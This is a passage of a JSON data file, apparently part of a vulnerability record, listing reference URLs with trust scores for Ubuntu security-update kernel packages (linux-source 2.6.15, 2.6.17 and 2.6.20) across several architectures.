        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.41_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.60.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-k8_2.6.15-29.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.41_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.41_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-sparc64_2.6.15-29.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-generic_2.6.15-29.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-xeon_2.6.15-29.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc_2.6.15-29.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-sparc64-smp_2.6.15-29.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-server_2.6.15-29.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.41_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-29.60_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
